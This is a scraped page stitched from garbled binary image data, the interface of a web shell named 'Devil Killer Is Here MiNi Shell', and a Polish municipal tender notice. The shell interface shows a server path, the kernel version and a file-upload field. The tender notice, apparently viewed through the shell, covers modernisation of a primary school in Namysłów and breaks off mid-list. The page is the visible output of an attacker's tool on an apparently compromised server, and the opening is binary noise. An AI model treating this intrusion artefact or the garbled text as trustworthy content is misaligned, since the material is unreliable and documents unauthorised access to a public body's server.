JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20180209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20180209/516621-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 516621-N-2018 z dnia 2018-02-09 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Namysłów, reprezentowana przez Burmistrza Namysłowa</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Modernizacja Szkoły Podstawowej Nr 5 w Namysłowie</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Tak</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu">Regionalny Program Operacyjny Województwa Opolskiego na lata 2014-2020 </span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Namysłów, reprezentowana przez Burmistrza Namysłowa</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">52451300000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Stanisława Dubois</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">3</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">46100 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Namysłów</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">opolskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">774 190 359</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">zamowienia@namyslow.eu</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">774 104 841</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.bip.namyslow.eu</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.bip.namyslow.eu</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.bip.namyslow.eu</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">pisemnie</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Urząd Miejski w Namysłowie, sekretariat, budynek A, pokój Nr 12</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Modernizacja Szkoły Podstawowej Nr 5 w Namysłowie</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZP.271.36.2018.KK</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">3.1 Nazwa i kod wg Wspólnego Słownika Zamówień:45214210-5 Roboty budowlane w zakresie szkół podstawowych. Przedmiotem zamówienia jest modernizacja Szkoły Podstawowej Nr 5 w Namysłowie. Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 3 do siwz.3.2 Zamawiający wymaga zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie umowy o pracę (art. 29 ust. 3a ustawy Pzp), osób realizujących czynności w ramach przedmiotu umowy, tj.: wykonanie robót w branży budowlanej, jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy (Dz. U. z 2014 r. poz. 1502, z późn. zm.).Wymagania określające w szczególności sposób dokumentowania zatrudnienia osób, o których mowa w art. 29 ust. 3a ustawy Pzp, uprawnienia Zamawiającego w zakresie kontroli spełniania przez Wykonawcę wymagań, o których mowa w art. 29 ust. 3a ustawy Pzp, oraz sankcje z tytułu niespełnienia tych wymagań określa wzór umowy stanowiący załącznik nr 2 do siwz.3.3	Zamawiający wymaga przeniesienia praw własności intelektualnej lub udzielenia licencji.3.4	Wykonawca zobowiązany jest zrealizować zamówienie na zasadach i warunkach opisanych w siwz i ofercie.Zakres zadania przewiduje wykonanie robot termomodernizacyjnych, remontowo-budowlanych oraz instalacyjnych i obejmuje w szczególności:1.	Dach:a)	rozbiórka istniejącego pokrycia dachowego z blachodachówki oraz z papy bitumicznej na zadaszeniach nad wejściami i lukarnami wraz z rozbiórką obróbek blacharskich;b)	rozbiórka deskowania dachu nad lukarnami;c)	uzupełnienie przewodów kominowych z wyprowadzeniem ponad dach wraz z wykonaniem tynków na kominie, czapki kominowej żelbetowej z kapinosem zabezpieczonej przeciwwilgociowo środkiem bitumicznym poprzez 2-krotne posmarowanie; wymiana tynków cementowo-wapiennych na kominach w części strychowej i ponad dachem, pomalowanie 2-krotne kominów farbą emulsyjną elewacyjną;d)	wykonanie impregnacji ogniochronnej i grzybobójczej poprzez 3-krotne posmarowanie konstrukcji więźby dachowej i stropów drewnianych środkiem typu FOBOS M4 lub o równoważnych parametrach;e)	montaż kontrłat drewnianych 6/2 cm z drewna impregnowanego;f)	wymiana łacenia połaci dachowych 6/4 cm oraz deskowania nad lukarnami z drewna impregnowanego z założeniem folii dachowej paroprzepuszczalnej o paroprzepuszczalności min. 1200 g/m2;g)	wymiana desek okapowych i wiatrowych z desek impregnowanych o grubości 32 mm zabezpieczonych lakierobejcą;h)	montaż obróbek blacharskich z blachy powlekanej w kolorze blachodachówki;i)	wykonanie pokrycia dachu z blachy dachówkopodobnej w kolorze ceglastym (po akceptacji Zamawiającego) spełniającej parametry: kolor ceglasty, grubość powłoki min. 35 um, odporność na zarysowania >= 1500, odporność na korozję - C3, odporność na UV - RUV3;j)	pokrycie 2-warstwowe zadaszeń nad wejściami oraz lukarn papą termozgrzewalną modyfikowaną SBS; papa wierzchniego krycia o grubości min. 5 mm z wkładką zbrojącąo gramaturze min. 1200 g/m2;k)	montaż rynien dachowych i rur spustowych z blachy powlekanej w kolorze blachodachówki lub zbliżonym (po akceptacji Zamawiającego);l)	wykonanie konstrukcji do montażu okien dachowych i montaż okien połaciowych wraz z obróbkami blacharskimi i wykończeniowymi;m)	montaż wyłazów dachowych fabrycznie wykończonych;n)	montaż płotków śniegowych i ław kominiarskich prefabrykowanych i kominków wentylacyjnych fabrycznie wykończonych.2.	Podpiwniczenie:a)	wykucie z muru drzwi wewnętrznych;b)	rozebranie ścianek działowych kabin ustępowych;c)	skucie istniejącej okładziny ściennej z płytek ceramicznych i posadzkowej z płytek ceramicznych;d)	zerwanie istniejącej wykładziny rulonowej PCV;e)	skucie tynków wewnętrznych cementowo-wapiennych z sufitów i ścian;f)	rozbiórka istniejących posadzek i podłoży betonowych;g)	usunięcie z budynku podłoża gruntowego (piaskowego) w celu obniżenia poziomu posadzki w części podpiwniczenia dla uzyskania wysokości kondygnacji netto 2,54 m;h)	wykonanie izolacji poziomej przeciwwilgociowej murów podpiwniczenia w poziomie projektowanej izolacji przeciwwilgociowej podposadzkowej metodą iniekcji grawitacyjnej;i)	wykonanie dodatkowych otworów drzwiowych z wykonaniem projektowanych przesklepień i rozebranie istniejących ścianek z cegły pełnej;j)	wykonanie nowych ścianek oraz zamurowanie zbędnych otworów z bloczków gazobetonowych;k)	wykonanie nowych tynków cementowo-wapiennych na sufitach i ścianach;l)	wykonanie warstw posadzkowych - podsypka piaskowa zagęszczona o grubości 5 cm, podłoże betonowe z betonu B-10 o grubości 8 cm, izolacja przeciwwilgociowa z folii izolacyjnej o grubości min. 0,2 mm, izolacja termiczna ze styropianu EPS 100 o grubości 10 cm, warstwa wyrównawcza posadzkowa z zaprawy cementowej o grubości 7 cm;ł)	licowanie ścian pomieszczeń sanitarnych do wysokości 2,05 m z zastosowaniem listew narożnikowych - kolorystyka i kształt płytek do uzgodnienia z Zamawiającym;m)	wykonanie posadzek z wykładziny rulonowej 2-barwnej w pomieszczeniu lekcyjnym i w szatniach z wywinięciem cokolików na ściany na wysokość 10 cm: w pozostałych pomieszczeniach oraz na klatce schodowej okładzina z płytek gresowych lakierowanych antypoślizgowych z wykonaniem cokolików do wysokości 10 cm - wzory i kolorystyka posadzek do uzgodnienia z Zamawiającym;n)	montaż stolarki drzwiowej wewnętrznej fabrycznie wykończonej: drzwi oddzielające poszczególne pomieszczenia od komunikacji ogólnej (korytarza) o odporności ogniowej EI30, do pomieszczenia węzła ciepłowniczego - EI60, pozostałe fabrycznie wykończonez wypełnieniem na tzw. plaster miodu; w drzwiach zamontowane zamki patentowe - kolorystyka do uzgodnienia z Zamawiającym; przy drzwiach odbojniki zabezpieczające ściany przed obiciem;o)	malowanie tynków wewnętrznych farbami emulsyjnymi zmywalnymi - kolorystyka do uzgodnienia z Zamawiającym;p)	montaż systemowych ścianek ustępowych z laminatu z drzwiami;r)	montaż wewnętrznych parapetów z granitu szlifowanego o grubości 3 cm wystających ok. 5 cm poza lico ściany;s)	montaż kratek wentylacyjnych bez żaluzji o wymiarach 14x21 cm.3.	Parter:a)	wykucie z muru drzwi wewnętrznych;b)	rozbiórka ścianek drewnianych w pomieszczeniu sekretariatu;c)	rozbiórka wykładzin podłogowych rulonowych oraz okładzin ściennych i posadzkowych z płytek ceramicznych wraz z warstwami podposadzkowymi (płyty wiórowe, płyty pilśniowe, podłogi z desek oraz zasypki podłogowe);d)	przestawienie ścianek działowych w wc z uzupełnieniem tynków;e)	wykonanie warstwy wyrównawczej podposadzkowej z zaprawy cementowej o grubości 7 cm zbrojonej matami zbrojeniowymi z drutu o grubości 3 mm o oczkach 15/15 cm;f)	wykonanie warstwy wyrównującej z zaprawy samopoziomującej o grubości 5 mm pod wykładziny rulonowe;g)	wykonanie posadzek z płytek gresowych lakierowanych antypoślizgowych oraz okładzin ściennych z płytek w pomieszczeniach sanitarnych - wzory i kolorystyka do uzgodnieniaz Zamawiającym;h)	wykonane posadzek rulonowych obiektowych 2-barwnych wraz z cokolikami wywiniętymi na ściany na wysokość 10 cm (sale lekcyjne z zapleczem, sekretariat, pokój dyrektora) - wzory i kolorystyka do uzgodnienia z Zamawiającym;i)	zeskrobanie starej farby i zmycie tynków wewnętrznych, zagruntowanie oraz wykonanie gładzi gipsowych 2-warstwowych (bez sufitów i lamperii);j)	wykonanie izolacji z folii paroizolacyjnej mocowanej do spodu belek stropowych;k)	wykonanie okładziny z płyt GKF o grubości 15 mm 2-warstwowo w systemie danej firmy w celu uzyskania odporności ogniowej REI60 wraz z obudową kanałów wentylacji nawiewno-wywiewnej;l)	montaż wewnętrznych parapetów z granitu szlifowanego o grubości 3 cm wystających ok. 5 cm poza lico ściany;ł)	montaż kratek wentylacyjnych bez żaluzji o wymiarach 14x21 cm;m)	malowanie tynków wewnętrznych farbami emulsyjnymi zmywalnymi - kolorystyka do uzgodnienia z Zamawiającym;n)	montaż stolarki drzwiowej wewnętrznej fabrycznie wykończonej: drzwi oddzielające poszczególne pomieszczenia od komunikacji ogólnej (klatki schodowej) w klasie odporności ogniowej EI30, pozostałe fabrycznie wykończone z wypełnieniem na tzw. plaster miodu; w drzwiach zamontowane zamki patentowe; w drzwiach do pomieszczeń sanitarnych - zamki łazienkowe oraz otwory nawiewne o łącznym przekroju min. 200 cm2 - kolorystyka do uzgodnienia z Zamawiającym; przy drzwiach odbojniki zabezpieczające ściany przed obiciem;4.	I piętro:a)	wykucie z muru drzwi wewnętrznych;b)	rozbiórka wykładzin podłogowych rulonowych wraz z warstwami podposadzkowymi (płyty wiórowe, płyty pilśniowe, podłogi z desek oraz zasypki podłogowe);c)	wykonanie izolacji z wełny mineralnej o grubości 20 cm pomiędzy belkami stropowymi;d)	montaż płyt OSB 2x12,5 mm na pióro i wpust mijankowo o 1/3 szerokości płyty;e)	wykonanie ścianki działowej dla wydzielenia pomieszczenia dla personelu w systemie EI30;f)	wykonane posadzek rulonowych obiektowych 2-barwnych wraz z cokolikami wywiniętymi na ściany na wysokość 10 cm (sale lekcyjne, pomieszczenie personelu) - wzory i kolorystyka do uzgodnienia z Zamawiającym;g)	wykonanie okładziny ściennej z płytek ceramicznych w pomieszczeniu personelu (fartuch przy umywalce 1,20x1,50 m - wzory i kolorystyka do uzgodnienia z Zamawiającym);h)	zeskrobanie starej farby i zmycie tynków wewnętrznych, zagruntowanie oraz wykonanie gładzi gipsowych 2-warstwowych (bez sufitów i lamperii);i)	wykonanie izolacji z folii paroizolacyjnej mocowanej do spodu belek stropowych;j)	wykonanie okładziny z płyt GKF o grubości 15 mm 2-warstwowo w systemie danej firmy w celu uzyskania odporności ogniowej REI60 wraz z obudową kanałów wentylacji nawiewno-wywiewnej;k)	montaż wewnętrznych parapetów z granitu szlifowanego o grubości 3 cm wystających ok. 5 cm poza lico ściany;l)	montaż kratek wentylacyjnych bez żaluzji o wymiarach 14x21 cm;ł)	malowanie tynków wewnętrznych farbami emulsyjnymi zmywalnymi - kolorystyka do uzgodnienia z Zamawiającym;m)	montaż stolarki drzwiowej wewnętrznej fabrycznie wykończonej: drzwi oddzielające poszczególne pomieszczenia od komunikacji ogólnej (klatki schodowej) w klasie odporności ogniowej EI30; w drzwiach zamontowane zamki patentowe - kolorystyka do uzgodnienia z Zamawiającym; przy drzwiach odbojniki zabezpieczające ściany przed obiciem;5.	Poddasze:a)	wykucie z muru drzwi wewnętrznych;b)	rozbiórka podsufitki z desek tynkowanych;c)	rozbiórka wykładzin podłogowych rulonowych wraz z warstwami podposadzkowymi (płyty wiórowe, płyty pilśniowe, podłogi z desek oraz zasypki podłogowe);d)	wymurowanie w części rozebranego komina z wyprowadzeniem ponad dach wraz z uzupełnieniem tynków i wykonaniem czapki kominowej betonowej zbrojonej;e)	wykonanie izolacji z wełny mineralnej o grubości 20 cm pomiędzy belkami stropowymi;f)	uzupełnienie konstrukcji stropu nad nowoprojektowanym pokojem nauczycielskim z drewna impregnowanego;g)	montaż płyt OSB 2x12,5 mm na pióro i wpust mijankowo na 1/3 szerokości płyty;h)	wykonanie ścianek działowych dla wydzielenia pokoju nauczycielskiego i w-c z izolacją akustyczną z wełny mineralnej;i)	wykonane posadzek rulonowych obiektowych 2-barwnych wraz z cokolikami wywiniętymi na ściany na wysokość 10 cm (sale lekcyjne, pomieszczenie komputerowe, biblioteka, pokój nauczycielski i pomieszczenie pomocnicze) - wzory i kolorystyka do uzgodnienia z Zamawiającym;j)	wykonanie posadzki i okładziny ściennej (do wysokości 2,05 m) z płytek ceramicznych w pomieszczeniu wc - wzory i kolorystyka do uzgodnienia z Zamawiającym;k)	zeskrobanie starej farby i zmycie tynków wewnętrznych, zagruntowanie oraz wykonanie gładzi gipsowych 2-warstwowych (bez sufitów i lamperii);l)	